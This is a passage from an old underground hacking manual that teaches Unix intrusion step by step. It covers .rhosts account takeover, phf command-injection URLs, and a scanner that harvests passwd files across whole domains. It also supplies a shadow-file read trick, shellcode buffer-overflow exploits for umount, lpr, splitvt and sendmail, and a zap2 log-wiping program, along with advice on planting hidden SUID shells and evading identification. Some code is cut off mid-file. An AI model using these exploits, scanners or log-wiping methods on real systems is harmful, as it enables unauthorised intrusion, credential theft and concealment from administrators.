drwxr-xr-x 5 601 daemon 512 Jan 26 1996 viewx drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www bash# ; notice tom is user number 302 ... hmmm lets put him in our passwd file bash# pico /etc/passwd tom:x:302:2::/home:/bin/bash ; this should do it ;) bash# su - tom ; su to the tom account ... bash$ ls -l total 18 drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk drwxr-xr-x 6 news news 512 Mar 6 1996 news drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk drwxr-xr-x 2 tom other 512 Mar 1 10:10 tom drwxr-xr-x 5 601 daemon 512 Jan 26 1996 view drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www bash$ ; NOTICE above that toms user number is gone ... we now own his dir! bash$ echo + +>>tom/.rhosts ; this will make a file in his dir called .rhosts bash$ ;inside .rhosts will be wild cards + + for anyone to rlogin to his account bash$ rlogin xxxxx.xxx we are tom on our machine, so lets just rlogin plain. Last login: Fri Mar 7 00:16:03 from xxxxx.xxxxxxxxxx Sun Microsystems Inc. SunOS 5.5 Generic November 1995 > ; yup we are in! > ls -al total 8 drwxr-xr-x 2 tom group 512 Mar 1 17:10 . drwxr-xr-x 14 tom group 512 Jan 24 11:16 .. -rw-r--r-- 1 tom group 144 Dec 30 15:32 .profile -rw-r--r-- 1 tom bin 8 Mar 11 08:26 .rhosts > So now we have access, so lets just hack this system ... oops, that is another lesson! Have pun! --------------------- Chapter III Getting passwd files --------------------- Here are some ways to get password files from unix systems. Most of them you will need an account, but there is still a way to access to the system without having an account. Here you will learn the difference between a regular passwd file and a shadowed passwd file. You will also learn a way to read the shadowed password file. ------------------ Section 3A PHF WWW PH Query ------------------ There is a program in the WWW cgi-bin directory called phf, if the file is there, and has permission x, you can access it by using the www, or a text version browser in linux called lynx. Now you can read files on the system (yup .. /etc/passwd) and save them to files local in your computer. There are many things we can get done here. If the server is running their httpd server as root owner, we can be root by using phf and even change an account password on the machine. I will include a perl script here that will auto check all of the systems out there by using the getdomain.pl script above and check what the server is running under. If it is running under root, it will just log the id, if the server is not running under root, it will auto get the passwd file from the /etc directory and name it domainname.???.passwd. I will also attach a script that will allow you to use a simple command from a shell and if phf is on the system allow you to pipe commands from the shell to the remote system with one command line. Ok now that you know what is coming, lets teach you how to use phf. Use your favorite web browser, or the text version in unix called most of the time lynx, on some systems www. After the screen comes up type the letter g, now a line appears like below: URL to open: Arrow keys: Up and Down to move. Right to follow a link; Left to go back. H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list You type: URL to open: http://xxx.org/cgi-bin/phf/?Qalias=x%0aid Arrow keys: Up and Down to move. Right to follow a link; Left to go back. H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list It returns: QUERY RESULTS /usr/local/bin/ph -m alias=x id uid=65534(nobody) gid=65535(nogroup) groups=65535(nogroup) So here we see it is running under a user (nobody), so we can be a user named nobody on this system. We are not root, but this will have to do ;) Notice the command line: http://afp.org/cgi-bin/phf/?Qalias=x%0aid The id was the command to the server to give us the id of the user. Some times you will have to give the full path to the file you want to run, in this case it would have been: http://afp.org/cgi-bin/phf/?Qalias=x%0a/usr/bin/id Notice that after the %0a you start your command line. If you need to enter a space you would put a %20 instead of the space. Here would be some sample command lines. I will start them with %0a Cat the passwd file %0a/bin/cat%20/etc/passwd Get a long directory of the /etc directory of all files starting with pass %0als%20-al%20/etc/pass* backup the passwd file if you have root access to httpd to passwd.my %0acp%20/etc/passwd%20/etc/passwd.my Change the root passwd (if the server will let you (most times it works) %0apasswd%20root (the above should let you login without a password, make sure to copy the passwd.my file over the passwd file right away, and then delete the backup, then make yourself an suid bash shell somewhere and rename it, sniff to get your passwords) If you know how to type commands in unix and don't forget that you need to use %20 in the place of spaces, you will not have any problems! Ok lets cat the passwd file on this box ;) URL to open: http://xxx.org/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd We get: QUERY RESULTS /usr/local/bin/ph -m alias=x cat /etc/passwd root:R0rmc6lxVwi5I:0:0:root:/root:/bin/bash bin:*:1:1:bin:/bin: daemon:*:2:2:daemon:/sbin: adm:*:3:4:adm:/var/adm: lp:*:4:7:lp:/var/spool/lpd: sync:*:5:0:sync:/sbin:/bin/sync shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown halt:*:7:0:halt:/sbin:/sbin/halt mail:*:8:12:mail:/var/spool/mail: news:*:9:13:news:/usr/lib/news: uucp:*:10:14:uucp:/var/spool/uucppublic: operator:*:11:0:operator:/root:/bin/bash games:*:12:100:games:/usr/games: man:*:13:15:man:/usr/man: postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash nobody:*:-2:100:nobody:/dev/null: ftp:*:404:1::/home/ftp:/bin/bash guest:*:405:100:guest:/dev/null:/dev/null bhilton:LkjLiWy08xIWY:501:100:Bob Hilton:/home/bhilton:/bin/bash web:Kn0d4HJPfRSoM:502:100:Web Master:/home/web:/bin/bash mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash A small passwd file rin If you want to save this to a file in your local directory, just choose the print option in the text browser and you will get an option to save the file in your home directory. Lets learn something here: mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash 1 :2 :3 :4 :5 :6 :7 1=username 2=encrypted password 3=user number 4=groop id 5=real name 6=home directory 7=shell Ok, lets say you do not want to keep using the WWW browser, here is a script you can compile to just type regular commands from your shell. phf.c ------ cut here---- /* Some small changes for efficiency by snocrash. */ /* * cgi-bin phf exploit by loxsmith [xf] * * I wrote this in C because not every system is going to have lynx. Also, * this saves the time it usually takes to remember the syntatical format * of the exploit. Because of the host lookup mess, this will take * approximately 12 seconds to execute with average network load. Be patient. * */ #include #include #include #include #include #include #include int main(argc, argv) int argc; char **argv; { int i = 0, s, port, bytes = 128; char exploit[0xff], buffer[128], hostname[256], *command, j[2]; struct sockaddr_in sin; struct hostent *he; if (argc != 3 && argc != 4) { fprintf(stderr, "Usage: %s command hostname [port]", argv[0]); exit(1); } command = (char *)malloc(strlen(argv[1]) * 2); while (argv[1][i] != '\0') { if (argv[1][i] == 32) strcat(command, "%20"); else { sprintf(j, "%c", argv[1][i]); strcat(command, j); } ++i; } strcpy(hostname, argv[2]); if (argc == 4) port = atoi(argv[3]); else port = 80; if (sin.sin_addr.s_addr = inet_addr(hostname) == -1) { he = gethostbyname(hostname); if (he) { sin.sin_family = he->h_addrtype; memcpy((caddr_t) &sin.sin_addr, he->h_addr_list[0], he->h_length); } else { fprintf(stderr, "%s: unknown host %s\n", argv[0], hostname); exit(1); } } sin.sin_family = AF_INET; sin.sin_port = htons((u_short) port); if ((s = socket(sin.sin_family, SOCK_STREAM, 0)) < 0) { fprintf(stderr, "%s: could not get socket\n", argv[0]); exit(1); } if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) { close(s); fprintf(stderr, "%s: could not establish connection\n", argv[0]); exit(1); } sprintf(exploit, "GET /cgi-bin/phf/?Qalias=X%%0a%s\n", command); free(command); write(s, exploit, strlen(exploit)); while(bytes == 128) { bytes = read(s, buffer, 128); fprintf(stdout, buffer); } close(s); } -------- cut here Here is how you use it: bash% phf id xxx.org ------

Query Results

/usr/local/bin/ph -m alias=X id

      uid=65534(nobody) gid=65535(nogroup) groups=65535(nogroup)
      ;
      close(FILE);
      
      # Open output file.
      open(OUTFILE, ">>GetURLResults") or die("GetURL: Cannot open output file.\n");
      
      my($url)="";
      foreach $url (@URLs) {
        print ("Now checking: $url");
        chomp($url);
        $result = `$program http://${url}/cgi-bin/phf?Qalias=x%0a/usr/bin/id`;
        print OUTFILE ("\n============ $url ============\n");
        foreach (split(/\n/, $result)) {
          print OUTFILE ("$_\n");
        }
        if ($result =~ m/id=/i) {
          if ($result =~ m/root/i) {
            print ("Logging root response.\n");
          } else {
            print ("Got ID response, getting /etc/passwd...");
            $result = `$program http://${url}/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd`;
            
            # Output results to file named .passwd;
            local($domainfilename)="";
            $domainfilename = $url;
            if (open(PASSWDFILE, ">${domainfilename}.passwd")) {
              print PASSWDFILE ("\n");
              foreach (split(/\n/, $result)) {
                print PASSWDFILE ("$_\n");
              }
              close(PASSWDFILE);
              print ("Done! [$domainfilename].\n");
            } else {
              print ("FAILED! [$domainfilename].\n");
            }
          }
        }
      }
        
      # We are done. Close the output file and end the program.
      close (OUTFILE);
      
      
      0;
      
      ------------- cut here
      
      Ok this is easy, if you name your domain file urls, you are all set to go.
      Just type geturl.pl after chmod +x on the file.
      
      Here are my doc's for the file:
      
      This handy tool is easy to use and will get you some root access and
      many passwd files from different domains.
      
      geturl.pl will try and log results for every domain on the internet.  You
      choose the type: .COM .EDU .ORG .MIL .GOV  (OR) you can supply a list of
      IP addresses to  be checked.  If  finds a root access account it
      will simply log uid=root in the result file and go on to the next domain.
      If PHF Probe finds non-root access it will snag the passwd file for you and
      save it in the current directory in the (domainname.???.passwd) format.
      
      Here are the short doc's and how it works.  Any questions /msg i-e or i^e
      
      ftp to ftp.rs.internic.net
      
      in the domain directory you will find:
      
      com.zone.gz
      edu.zone.gz
      gov.zone.gz
      mil.zone.gz
      net.zone.gz
      org.zone.gz
      
      download these files and run getdomain.pl on the domains you want to target
      first, in this manor:  "perl getdomain.pl com.zone com >com.all"
      
      What this will do is rip all of the .COM domains and put them into a file
      called com.all.
      
      If you wanted to do all of the .EDU addresses you would type:
      
      perl getdomain.pl edu.zone edu >edu.all
      
      Now you will have a list to use with (geturl.pl) called edu.all
      
      To use this list just type:
      
      geturl.pl 
      
      filename=edu.all or com.all  and leave out the <>'s
      if you name your domain file 'urls' it does not require 
      
      results will log into a file name of: GetURLResults in the current directory.
      
      1. geturl.pl will search using lynx (make sure it is in your path)
      
      2. if geturl finds it has root access to httpd on a url it will just log
         root for that domain in the result file.  If geturl finds it is not root,
         but still has access to the domain using phf it will snatch the domain
         passwd file and save it in the current directory under fulldomainname.passwd
      
      3. if you like you can just give a list of ip addresses in the feed file
      
      4. i use os/2 with lynx and perl ported to the hpfs so i have no problems
         with the long file names.  i have tested it under unix and it works good
         so you should have no problems running this in a unix shell.
      
      What you need:
      
      1. Perl in the path
      2. Lynx in the path
      3. 256 char filenames ie: (unix or os/2 hpfs)
      4. The files included here
      5. Internic's domain files from their ftp or just make your own list or
         urls or IP's and name the file 'urls' and type: geturl.pl
      
      Caution:
      
      It would be best if you paid cash for an internet account in your area under
      another name or used a hacked account to get all of your results, then used
      another safe account to start your work on the results.  BUT I don't need to
      tell you this right?  I take no blame for these files, they are provided for
      you to use to check security on domains ;)
      
      
       getdomain.pl: to rip .ORG .COM .EDU .MIL .GOV Internic domain files
          geturl.pl: to check and log the results of each domain
      GetURLResults: The file that geturl makes as its log file
      
      Here is one more thought:
      
      If you can read the /var/adm/messages file you can get some user passwords
      out of there lotz of times!  I have even got ROOT passwords from there!
      
      Wow many times have you been in a hurry to login?  You type the password
      at the Login:  his is easy to do on one of those days that nothing seems to
      be going right.  You failed the login twice, the system is running slow, and it
      just happens!
      
      Login: you hit enter
      Password: you think this is wanting the login name so you type your name
      Login: you type your password
      
      In the messages file it looks like this:
      
      Login: yourpassword
      Password ****** They don't give it, only the login name, but ooops, you
      typed your password, and if we have access to read the messages file,
      we have a good password to put in crackerjack and run it.  If on a small
      system, no prob ... lets hope it's root ;)
      
      Here is a script to make things easy!
      
      
      FOR QUANTUM'S BINDWAREZ FILE: You will find it at the end of this paper
      in the appendix uuencoded.
      
      ------------ cut here
      
      #!/bin/sh
      # Under a lot of linux distributions(I know Redhat 3.0.3 and Slackware 3.0)
      # /var/log/messages is world readable. If a user types in his password at
      # the login prompt, it may get logged to /var/log/messages.
      #
      # I could swear this topic has been beaten to death, but I still see this
      # problem on every linux box I have access to.
      #
      # Dave G.
      # 12/06/96
      # 
      # http://www.escape.com/~daveg
      
      echo Creating Dictionary from /var/log/messages, stored in /tmp/messages.dict.$$
      
      grep "LOGIN FAILURE" /var/log/messages | cut -d',' -f2 | cut -c2- | sort | uniq >> /tmp/messages.dict.$$
      
      if [ ! -e ./scrack ]
      then
         echo "Creating scrack.c"
         cat << ! > scrack.c
      #include 
      #include 
      #include 
      #include 
      #define get_salt( d, s ) strncpy( d, s, 2 )
      void
      main(argc,argv)
      int argc;
      char **argv;
      {
         struct passwd *pwd;
         FILE *fp;
         char buff[80], salt[3], *encrypted_string;
      
         if ( ( fp = fopen( argv[1], "r" ) ) == NULL )
         {
            fprintf( stderr, "Couldnt find dict file\n" );
            exit(1);
         }
         while ( fgets( buff, 80, fp ) != NULL )
         {
            setpwent();
            buff[strlen(buff)-1]='\0';
            while ( ( pwd = getpwent() ) != NULL )
            {
              if ( strcmp( (*pwd).pw_passwd, "*" ) != 0 &&
                 ( strlen( (*pwd).pw_passwd ) == 13 ) )
              {
                 get_salt(salt, (*pwd).pw_passwd );
      
                 encrypted_string = crypt( buff, salt );
                 if ( strcmp( encrypted_string, (*pwd).pw_passwd ) == 0 )
                 {
                   fprintf( stdout, "l: %s p: %s\n", (*pwd).pw_name, buff);
                   fflush(stdout);
                 }
               }
            }
         }
      }
      !
         echo "Creating scrack"
         cc -O6 -fomit-frame-pointer -s -o scrack scrack.c
      fi
      
      ./scrack /tmp/messages.dict.$$
      
      echo /tmp/messages.dict.$$, ./scrack, and ./scrack.c still exist, delete them yourself.
      
      ------ cut here
      
      -----------------------
      Section 3B
      Newbe's
      -----------------------
      
      Yup, again, just another place to get password files.  Just follow the guide
      lines in section 2B.  Use your sly ideas and get out there and make some
      lame friends ;)
      
      Remember you could have been a lammer before you read this manual rin
      
      -----------------------------
      Section 3C
      Getting shadow passwd files
      -----------------------------
      
      What is a shadow password file?
      
      Lets just use the passwd file above to show you what it would look like to you
      if you cat it.
      
      root:x:0:0:root:/root:/bin/bash
      bin:x:1:1:bin:/bin:
      daemon:x:2:2:daemon:/sbin:
      adm:x:3:4:adm:/var/adm:
      lp:x:4:7:lp:/var/spool/lpd:
      sync:x:5:0:sync:/sbin:/bin/sync
      shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
      halt:x:7:0:halt:/sbin:/sbin/halt
      mail:x:8:12:mail:/var/spool/mail:
      news:x:9:13:news:/usr/lib/news:
      uucp:x:10:14:uucp:/var/spool/uucppublic:
      operator:x:11:0:operator:/root:/bin/bash
      games:x:12:100:games:/usr/games:
      man:x:13:15:man:/usr/man:
      postmaster:x:14:12:postmaster:/var/spool/mail:/bin/bash
      nobody:x:-2:100:nobody:/dev/null:
      ftp:x:404:1::/home/ftp:/bin/bash
      guest:x:405:100:guest:/dev/null:/dev/null
      bhilton:x:501:100:Bob Hilton:/home/bhilton:/bin/bash
      web:x:502:100:Web Master:/home/web:/bin/bash
      mary:x:503:100:Mary C. Hilton:/home/mary:/bin/bash
      
      Something missing?  Yup, the encrypted passwords.  If you get root access the
      encrypted passwords are in /etc/shadow.  Some admin's will hide the shadow file
      in some weird directory somewhere, but most of the time you will find it right
      in /etc.  Other shadow programs might put it in a master.passwd file.  But if
      you get root just have a good look around.
      
      Lets say you have an account on the machine and just can't get root access.
      
      Not a problem if they are using libc 5.4.7, at this time most still are ;)
      Also one of these files have to have suid perm's (no prob):
      
      ping, traceroute, rlogin, or, ssh
      
      1. Type bash or sh to start a bash shell
      2. Type: export RESOLV_HOST_CONF=/etc/shadow
      3. Type one of the file names above with asdf, like this:
      
      ping asdf
      
      It should cat the passwd shadow file for you if it works.
      I seem to find it working on most of the systems i am going on these days.
      
      Note: you can replace /etc/shadow with any root owned file you want to read.
      
      Here is a quick script you can run on any file you want to make it easy:
      
      rcb.c
      -------- cut here
      
      /* RCB Phraser - therapy in '96
       * Limits: Linux only, no binary files.
       * little personal message to the world: FUCK CENSORSHIP!
       */
      
      #include 
      
      void getjunk(const char *filetocat)
      { setenv("RESOLV_HOST_CONF",filetocat,1);
        system("ping xy 1> /dev/null 2> phrasing");
        unsetenv("RESOLV_HOST_CONF");
      }
      
      void main(argc,argv)
      int argc; char **argv;
      { char buffer[200];
        char *gag;
        FILE *devel;
        
        if((argc==1) || !(strcmp(argv[1],"-h")) || !(strcmp(argv[1],"--help")))
        { printf("RCB Phraser - junked by THERAPY\n\n");
          printf("Usage: %s [NO OPTIONS] [FILE to cat]\n\n",argv[0]);
          exit(1);
        }
        getjunk(argv[1]);
        gag=buffer;
        gag+=10;
        devel=fopen("phrasing","rb");
        while(!feof(devel))
        { fgets(buffer,sizeof(buffer),devel);
          if(strlen(buffer)>24)
          { strcpy(buffer+strlen(buffer)-24,"\n");
            fputs(gag,stdout);
          }
        }
        fclose(devel);
        remove("phrasing");
      }
      
      -------------- cut here
      
      command line : rcb /etc/shadow  or any other file on the system you
      can't read ;)
      
      --------------------
      Section 3D
      Getting /etc/hosts
      --------------------
      
      Just a precaution, sometimes you will need to know what other systems
      are in the hosts file, or what are all of the ip addresses or different domains
      on the system.  Make sure to cat the /etc/hosts file for more information
      you might need later.
      
      --------------------------
      Chapter IV
      Getting the root account
      --------------------------
      Like I said before all you need is one account in most cases, if you cannot get
      root on the system you might want to trade it off to some irc junkie that
      just wants to load a bot, for some other account or info that can help you in
      your hacking quest.  There will be enough information here so that if you can't
      get root access, their system is well kept and probably will be kept up in the
      future.  You can always lay the account on the side, put the info in some kind
      of log file with some good notes so that you can come back at a later time,
      like right when a new exploit comes out ;)
      
      Try to stay out of the system until that time so that you do not risk loosing
      the account.  Remember that when you login to an account and can't get root
      you will not be able to clean the logs, and the next time the user logs in he
      might see a message that says: last login from xxx.com time:0:00 date:xx/xx/xx
      
      ------------
      Section 4A
      Bugs
      ------------
      
      There are many bugs out there in different programs that you can use to get
      root.  It might be a game installed on the system, or even the sendmail
      program.  If they do not update their programs on a regular basis, you can
      be sure you will be able to get in now, and if not, soon to come.
      
      I will be sure to provide the main exploits and bugs here and other less
      used below in the appendix section.  I will make sure here to give you detailed
      english terms so that you can exploit root on the system.  But please be sure
      to read the sections below, and this manual entirely before proceeding, to be
      sure you get started in the right way and not blow you chances of having a
      long stay on the system.
      
      ------------
      Section 4B
      Exploits
      ------------
      
      umount/mount exploit
      
      Look in the /bin directory for a file called umount (or mount),
      if you do not find it there do a search for the file like this:
      
      find / -name umount -print -xdev
      
      (you can look for any other file name the same way)
      
      Go to the directory where the file is and do: ls -al um*
      
      If the file has suid perm's you can probably get root.
      
      SUID perm's has the rws for the owner of the file which is root.  What you are
      looking for is the (s)
      
      
      Look here:
      
      victim:/bin# ls -al um*
      -rwsr-sr-x   1 root         8888 Mar 21  1995 umount
      victim:/bin#
      
      This machine we can get root by a compile on the file below:
      
      umount.c
      ------ cut here
      
      /* sno.c : Linux realpath exploit
       * Syntax: ./sno N
       *         mount $WOOT 
       *    OR  umount $WOOT
       * N is some number which seems to differ between 4 & 8, if your number is
       * too big, you will get a mount error, if it is too small, it will seg
       * fault.  Figure it out.  (Sometimes N=0 for mount)
       * If you use mount, first thing to do once you get the root shell is rm 
       * /etc/mtab~, if this file exists you can't root with mount until it is 
       * removed.
       * 
       *
       *                                          -ReDragon
       */
      #define SIZE 1024
      
         long get_esp(void)
         {
         __asm__("movl %esp,%eax\n");
         }
      
         main(int argc, char **argv)
         {
         char env[SIZE+4+1]; /* 1024 buffer + 4 byte return address + null byte */
         int a,r;
         char *ptr;
         long *addr_ptr;
         char execshell[] =
         "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
         "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
         "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
         char *exec_ptr = execshell;
      
         r=atoi(argv[1]);  
         ptr = env;
         memcpy(ptr,"WOOT=",5); /* set environment variable to use */
         ptr += 5;              
      
         for(a=0;a
      #include 
      #include 
      
      #define DEFAULT_OFFSET          50
      #define BUFFER_SIZE             1023
      
      long get_esp(void)
      {
         __asm__("movl %esp,%eax\n");
      }
      
      void main()
      {
         char *buff = NULL;
         unsigned long *addr_ptr = NULL;
         char *ptr = NULL;
      
         u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
                              "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
                              "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
                              "\xd7\xff\xff\xff/bin/sh";
         int i;
      
         buff = malloc(4096);
         if(!buff)
         {
            printf("can't allocate memory\n");
            exit(0);
         }
         ptr = buff;
         memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
         ptr += BUFFER_SIZE-strlen(execshell);
         for(i=0;i < strlen(execshell);i++)
            *(ptr++) = execshell[i];
         addr_ptr = (long *)ptr;
         for(i=0;i<2;i++)
            *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
         ptr = (char *)addr_ptr;
         *ptr = 0;
         execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
      }
      ---------- cut here
      
      ***************************
      Here is the BSD version
      ***************************
      
      lpr.bsd.c
      --------------------------------------------------------- cut here
      #include 
      #include 
      #include 
      
      #define DEFAULT_OFFSET          50
      #define BUFFER_SIZE             1023
      
      long get_esp(void)
      {
         __asm__("movl %esp,%eax\n");
      }
      
      void main()
      {
         char *buff = NULL;
         unsigned long *addr_ptr = NULL;
         char *ptr = NULL;
      
         char execshell[] =
         "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
         "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
         "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
         "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
      
         int i;
      
         buff = malloc(4096);
         if(!buff)
         {
            printf("can't allocate memory\n");
            exit(0);
         }
         ptr = buff;
         memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
         ptr += BUFFER_SIZE-strlen(execshell);
         for(i=0;i < strlen(execshell);i++)
            *(ptr++) = execshell[i];
         addr_ptr = (long *)ptr;
         for(i=0;i<2;i++)
            *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
         ptr = (char *)addr_ptr;
         *ptr = 0;
         execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
      }
      --------- cut here
      
      Now just compile it and chmod it +x, and run it.
      
      Watch this one on the group file owner.  Any file you copy will have
      group owner as lp, make sure you chgrp root filename on any file you
      write.  Always be watching the user groups with ls -l and if you changed
      any change them back like this:
      
      chgrp groupname filename
      
      It is a good idea to use this exploit ONLY to get the root access, then
      just copy bash or sh to another file name on the system somewhere and make
      it root root, suid:  Group owner and File owner root, then chmod it +s
      
      This will give you root access in the future as gid and uid root, without using
      the lp group.  Make sure you name it something that looks like it should be
      running as a root process somewhere ;)
      
      *****************
      Here is another that is still around after a while, look for SUID perm's
      on a file /usr/bin/splitvt
      
      If it has suid perm's use this file below, but be sure to read the directions
      after the exploit:
      ****************************************
      sp.c
      -------------------------------------------- cut here
      /*
       *            Avalon Security Research
       *                          Release 1.3
       *                           (splitvt)
       *
       * Affected Program: splitvt(1)
       *
       * Affected Operating Systems: Linux 2-3.X
       *
       * Exploitation Result: Local users can obtain superuser privileges.
       *
       * Bug Synopsis: A stack overflow exists via user defined unbounds checked
       * user supplied data sent to a sprintf(). 
       *
       * Syntax: 
       * crimson~$ cc -o sp sp.c
       * crimson~$ sp
       * bash$ sp
       * bash$ splitvt
       * bash# whoami
       * root
       *
       * Credit: Full credit for this bug (both the research and the code)
       * goes to Dave G. & Vic M.  Any questions should be directed to
       * mcpheea@cadvision.com . 
       *
       * ----------------------------------------------------------------------------
       */
      
      
      long get_esp(void)
      {
      __asm__("movl %esp,%eax\n");
      }
      main()
      {
        char eggplant[2048];
        int a;
        char *egg;
        long *egg2;
        char realegg[] =
      "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
      "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
      "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
        char *eggie = realegg;
      
        egg = eggplant;
      
        *(egg++) = 'H';
        *(egg++) = 'O';
        *(egg++) = 'M';
        *(egg++) = 'E';
        *(egg++) = '=';
      
        egg2 = (long *)egg;
      
        for (a=0;a<(256+8)/4;a++) *(egg2++) = get_esp() + 0x3d0 + 0x30;
      
        egg=(char *)egg2;
      
        for (a=0;a<0x40;a++) *(egg++) = 0x90;
      
        while (*eggie)
          *(egg++) = *(eggie++);
        *egg = 0; /* terminate eggplant! */
      
        putenv(eggplant);
      
        system("/bin/bash");
      }
      
      -------------- cut here
      
      Ok this is how splitvt works:
      
      1. Compile the file
      2. Run the sp file
      3. Run splitvt
      
      Before you run the file:   whoami {press enter}
                                 username
      After you run the exploit: whoami
                                 root
      
      *******************************************************
      
      Now if all of these have not got you root, try sm.sh.  This is a sendmail
      bug that works with 8.73 to 8.83 (maybe some others)
      
      Here is the script:
      
      sm.sh
      ---------- cut here
      echo   'main()                                                '>>smtpd.c
      echo   '{                                                     '>>smtpd.c
      echo   '  setuid(0); setgid(0);                               '>>smtpd.c
      echo   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c
      echo   '}                                                     '>>smtpd.c
      echo   'main()                                                '>>leshka.c
      echo   '{                                                     '>>leshka.c
      echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c
      echo   '}                                                     '>>leshka.c
      
      cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
      ./leshka
      kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
      rm leshka.c leshka smtpd.c /tmp/smtpd
      cd /tmp
      sh
      ------------ cut here
      
      Just chmod the file +x like this
      
      chmod +x sm.sh
      
      1. Run the file
      2. It will take you to the /tmp directory
      3. type ls -l and see if you have a SUID sh file there, if you do, type
         whoami, if not root, run the file ./sh, now see if you are root ;)
      
      I will add many more scripts in the appendix, but these should be the best
      at this time to get root access on linux or BSD, if you need another BSD
      exploit try the crontab exploit for BSD in the appendix.
      ****************************************************************************
      
      --------------------------
      Chapter V
      Making yourself invisible
      --------------------------
      
      The whole point of this hacking stuff is that you continue to have access to as
      many points of information as possible.  If you do stupid things, of fail just
      once to clean your utmp or wtmp, xferlog's, etc ... you can loose access to the
      system.  Make yourself a regular order to follow and learn each system well!
      
      Become part of the system, and take many notes if you are doing many systems
      at once.  But remember make yourself a routine.  Have your set routine of
      taking your time to clean any presence of your login, transfers, etc.  Do NOT fail
      in this one thing or you will loose access and possibly face some sort of
      charges.
      
      ----------------------------
      Section 5A
      Zap2 (for wtmp/lastlog/utmp)
      ----------------------------
      
      There are different log cleaning programs out there, but the best of these
      is zap2.  I compile mine to be named z2.
      
      z2 will be run right after you get root access.  This will want to be one of
      the fastest things you run.  (you never know)
      
      You might want to do a finger @host.xxx to see who is on now, look at the idle
      time of root or admin accounts to see if they are away doing something.
      
      Login, and as soon as you get on, type w, to see idle time and who is on, but
      at the same time you are looking at that be typing your root access command
      that you should have waiting somewhere nested in the system.  As soon as you
      get your root access, type ./z2 username-u-logged-in-as
      
      Now you are safer then you were.  Do a w or who command to see that you are
      gone from the utmp.  If you ftp, or do other things you might have to use
      other programs I will include in the next section called wted and lled.
      
      Lets finish with this z2 first.  You will have to see where each file is in
      the system and edit z2.c to include the right location of these files
      
      Here is the area you will look for right at the top of the file:
      
      #define WTMP_NAME "/usr/adm/wtmp"
      #define UTMP_NAME "/etc/utmp"
      #define LASTLOG_NAME "/usr/adm/lastlog"
      
      Most of the systems I login to are:
      
      #define WTMP_NAME "/var/adm/wtmp"
      #define UTMP_NAME "/var/adm/utmp"
      #define LASTLOG_NAME "/var/adm/lastlog"
      
      
      But you do your own look around to see were the files are.  Also /var/log:
      is a regular location.
      
      Add the log locations for each system, compile the file, and you are all ready
      to be invisible right after the login using z2
      
      Here is the .c file
      
      z2.c
      --------------------------- cut here
      #include 
      #include 
      #include 
      #include 
      #include 
      #include 
      #include 
      #include 
      #define WTMP_NAME "/usr/adm/wtmp"
      #define UTMP_NAME "/etc/utmp"
      #define LASTLOG_NAME "/usr/adm/lastlog"
       
      int f;
       
      void kill_utmp(who)
      char *who;
      {
          struct utmp utmp_ent;
       
        if ((f=open(UTMP_NAME,O_RDWR))>=0) {
           while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
             if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                       bzero((char *)&utmp_ent,sizeof( utmp_ent ));
                       lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                       write (f, &utmp_ent, sizeof (utmp_ent));
                  }
           close(f);
        }
      }
       
      void kill_wtmp(who)
      char *who;
      {
          struct utmp utmp_ent;
          long pos;
       
          pos = 1L;
          if ((f=open(WTMP_NAME,O_RDWR))>=0) {
       
           while(pos != -1L) {
              lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
              if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
                pos = -1L;
